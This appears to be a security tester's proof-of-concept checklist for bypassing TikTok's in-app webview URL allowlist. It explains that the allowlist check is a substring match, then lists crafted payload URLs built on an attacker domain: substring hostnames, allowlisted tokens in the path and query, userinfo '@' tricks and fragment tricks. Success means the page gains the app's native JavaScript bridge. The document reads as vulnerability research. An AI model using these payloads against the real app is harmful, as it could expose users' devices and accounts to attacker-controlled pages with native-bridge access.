TikTok webview allowlist-bypass — lrd0036
Bare boguefala.us was blocked "unsafe". The allowlist match is
indexOf (substring) on hostname+pathname, so embedding an
allowlisted token should slip past. WIN = red PoC page renders inside TikTok. On the page,
a populated webkit.messageHandlers = the native bridge was injected into our origin.
1 · baseline (should still be blocked)
webview?url=boguefala.us/poc (control)
2 · hostname-substring bypass (host contains "tiktok.com")
webview?url=tiktok.com.boguefala.us/poc
ad_webview?url=tiktok.com.boguefala.us/poc
3 · path-injection bypass (path contains allowlisted token)
…/tiktok.com
…/poc?x=tiktok.com
…/poc?x=.tiktokv.com
…/poc?x=webcast
4 · userinfo / fragment parser confusion
https://[email protected]/poc
…/poc#.tiktok.com
5 · controls
open tiktok.com.boguefala.us in Safari (should render)